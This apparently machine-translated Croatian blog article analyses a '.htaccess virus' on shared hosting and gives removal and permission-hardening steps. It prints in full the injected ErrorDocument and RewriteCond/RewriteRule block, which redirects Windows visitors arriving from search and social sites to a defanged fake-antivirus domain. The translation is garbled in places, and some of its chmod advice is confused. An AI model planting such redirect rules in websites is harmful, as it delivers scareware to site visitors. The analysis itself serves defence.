Zlonamjerni softver / virus - .htaccess "prepiši" i preusmjeri

Novi oblik virusa što ja ne vidim znam puno, utjecati na lokalitete domaćin na nepouzdani poslužitelji gdje se između njih mogu "vidjeti" korisnički računi / računi poddomena. Konkretno, računi hostinga stavljaju se u mapu "vhosts“, I pravo pisanja Korisnik mape "vhosts" daje običnom korisniku ... prodavač u većini situacija. To je tipična metoda web poslužitelja koji ne koriste WHM / cPanel.

.Htaccess virus action - .htaccess hack

Virus utjecati na datoteke .htaccess Site žrtve. I dodao linije / Direktiva na preusmjeriti posjetitelja (dolaze s yahoo, msn, google, facebook, yaindex, twitter, myspace, itd. web mjesta i portali s velikim prometom) na neke web stranice koje nude "antivirus“. Riječ je o lažni antivirusni, Koje sam napisao u uvodu .

Ovo je način kako .htaccess utjecati: (Ne pristupiti sadržaju URL-a u sljedeće linije)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0 
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2 
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.* 
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$ 
RewriteCond %{HTTP_USER_AGENT} .*Windows.* 
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]

Oni koji koriste WordPress pronaći će ove retke u datoteci .htaccess od public_html. Uz to, virus stvara identičan .htaccess u mapi wp-sadržaja.

*Postoje i situacije u kojima se umjesto peoriavascularsurgery.com pojavljuje dns.thesoulfoodcafe.com ili druge adrese.

Što ovaj virus radi?

Jednom preusmjeren, posjetitelj je raširenih ruku dočekan porukom:

Upozorenje!
Vaše računalo sadrži razne znakove prisutnosti virusa i zlonamjernog softvera. tvoj system zahtijeva hitnu provjeru virusa!
System Sigurnost će izvršiti brzo i besplatno skeniranje vašeg računala na viruse i zlonamjerne programe.

zlonamjerni softver 1

Bez obzira na tipku koju pritisnemo, preusmjerit ćemo se na stranicu "Moje računalo", Stvoren za oponašanje XP dizajn. Tu automatski započinje "postupak skeniranja", na kraju kojeg otkrivamo da smo "zaraženi".

zlonamjerni softver 2

Nakon pritiska na OK ili Cancel, počet će preuzimanjedatoteke setup.exe. Ovaj setup.exe je lažni antivirus koji utječu na sustav. Instalirat će niz zlonamjernih programa za daljnje širenje zaraženih veza, a uz to i anti-virus softver (također lažni) koji je žrtva pozvana kupiti.
Oni koji su već oboljeli od ovog oblika virusa mogu ga koristiti . Također se preporučuje skeniranje cijelog tvrdog diska. Preporuči Kaspersky Internet Security ili Kaspersky Anti-Virus.

Ovaj oblik virusa utječe na operativni sustav posjetitelja s operativnim sustavima Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Do danas nisu poznati slučajevi zaraze operacijskim sustavima Windows Pogled da Windows 7.

Kako možemo ukloniti ovaj .htaccess virus s poslužitelja i kako možemo spriječiti zarazu.

1. Analiza datoteka i brisanje sumnjivih kodova. Kako bi se osiguralo da to utječe ne samo na datoteku .htaccess dobro je analiziramo sve datoteke . PHP si . Js.

2. Prepišite .htaccess datoteku i postavite je chmod 644 ili 744 s pravima pisanja samo na vlasnik korisnika.

3. Prilikom izrade računa hostinga za web mjesto, u mapi / Početna ili / webroot automatski će stvoriti mapu koja najčešće ima korisničko ime (korisnik za cpanel, ftpitd.). Da biste spriječili upisivanje podataka i prijenos virusa s jednog korisnika na drugog, preporučuje se postaviti na svaku korisničku mapu:

chmod 644 sau 744, 755 - indicat este 644. 
chown -R nume_user nume_folder. 
chgrp -R nume_user nume_folder

ls-svi kako biste provjerili jesu li načini ispravno postavljeni. Nešto kao:

drwx--x--x 12 dinamics  dinamics   4096 May  6 14:51 dinamics/ 
drwx--x--x 10 duran duran  4096 Mar  7 07:46 duran/ 
drwx--x--x 12 eprubete eprubete  4096 Jan 29 11:23 eprubete/ 
drwxr-xr-x 14 express express  4096 Feb 26  2009 express/ 
drwxr-xr-x  9 ezo ezo  4096 May 19 01:09 ezo/ 
drwx--x--x  9 farma farma 4096 Dec 19 22:29 farma/

Ako će netko od gore navedenih korisnika imati FTP Zaražene datoteke, neće moći poslati virus drugom hostiranom korisniku. To je minimalna sigurnosna mjera za zaštitu računa hostiranih na web poslužitelju.

Uobičajeni elementi domena na koje utječe ova vrsta virusa.

Sve zahvaćene domene preusmjeravaju posjetitelje na web stranice koje sadrže "/main.php? s = 4 & H".

Ovo ".htaccess virus"Utječe na bilo koju vrstu CMS-a (Joomla, WordPress, phpBBitd.) koji koristi .htaccess

.Htaccess Virus Hack & preusmjeravanje.

Ostavi odgovor

Tvoj email address neće biti objavljen. Obavezna polja su označena *

ukupno
0
Dijeljenja
Prethodni članak

Zaštitite svoje važne podatke računala pomoću zrcaljenja diska [Windows 7 značajka]

Sljedeći članak

Preuzmite ravnalo na ekranu (ili liniju Webdesigner) - besplatno Windows aplikacija

Korisnici koji traže:

pharma hack wirus pomoc, mozilla firefox redirect virus, htaccess virus, सर्वर वायरस , переписывает htaccess, virus pagina livejasmin, cara instal web hosting yang terkena virus di cpanel dengan anti virus kapersky, як видалити вірус Pornclub, windows boot manager windows 7 แก้ยังไง, xp ümberkirjutamise kaitset,